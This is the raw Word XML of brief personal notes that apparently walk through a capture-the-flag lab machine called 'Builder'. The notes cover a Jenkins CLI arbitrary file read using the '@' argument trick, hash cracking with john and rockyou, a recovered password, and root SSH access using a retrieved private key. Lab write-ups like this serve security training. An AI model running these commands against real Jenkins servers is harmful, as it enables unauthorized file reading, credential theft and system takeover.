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77FCA03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792084">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Builder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17F750F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7336E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336E3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7336E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336E3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7336E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336E3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7336E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336E3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip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5D5C5302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notice the version of the website and try to find exploit of it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78971789" w14:textId="39E9579B" w:rsidR="00843DCE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we obtain then try to visit it and we obtain the .tar file location so try to visit it with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wegt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to downloads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64C741F1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jnlpJars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>/jenkins-cli.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEBA2A1" w14:textId="4B39A639" w:rsidR="00843DCE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wget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ip:8080/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jnlpJars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>/jenkins-cli.jar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5D51D9E6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java -jar jenkins-cli.jar -s http://ip:8080 connect-node '@/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>/passwd'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28213D66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@ is mention in the google exploit that its mandatory </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CC8CBC" w14:textId="1E3D3AAA" w:rsidR="00843DCE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java -jar jenkins-cli.jar -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noCertificateCheck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-s 'http://10.129.230.220:8080' help "@/var/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jenkins_home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>/user.txt"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7BCD6247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docker pull Jenkins/Jenkins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11402F9D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docker logs d4cd = copy the password </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666F4A36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docker inspect d4cd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567EF1F3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we see the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ipaddress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and the </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F14EC8A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lastRenderedPageBreak/>
        <w:t>ip:8080 and enter the password and create an account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C34E3D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docker exec -it d4cd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sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1F9D476A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ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC96B65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bash </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2A033F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and we obtain the shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCB3D9C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cat users/users.xml = we obtain amra_5955286986173787020</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63076C93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cat users/amra_5955286986173787020/config.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDD3A9D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we obtain password hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781E727F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java -jar jenkins-cli.jar -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noCertificateCheck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-s 'http://10.129.230.220:8080'connect-node "@/var/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jenkins_home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>/users/users.xml"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431B6DB2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java -jar jenkins-cli.jar -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noCertificateCheck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-s 'http://10.129.230.220:8080'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4C0D60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connect-node "@/var/jenkins_home/users/jennifer_12108429903186576833/config.xml"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A9C8D6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john hash -w=/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>/share/wordlists/rockyou.txt = save hash to the hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8A6C9F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jennifer:princess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to login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B75D00C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we see somewhere root with ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BB56B7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 xml:space="preserve">so try to visit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intall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plugin with ssh test where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pipline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 file showcase us the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id_rsa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is there so just connect the ssh </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFA9C26" w14:textId="77777777" w:rsidR="00BA3CE2" w:rsidRPr="00BA3CE2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chmod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600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root_key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="05C2DC30" w14:textId="3B452669" w:rsidR="00843DCE" w:rsidRDefault="00BA3CE2" w:rsidP="00BA3CE2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA3CE2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ssh -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A3CE2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>root_key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BA3CE2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> root@10.129.230.220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3E80525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7336E3"/>
    <w:rsid w:val="00792084"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="00863F51"/>
    <w:rsid w:val="009A2BA3"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00B45B0E"/>
    <w:rsid w:val="00BA3CE2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2025-12-12T04:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>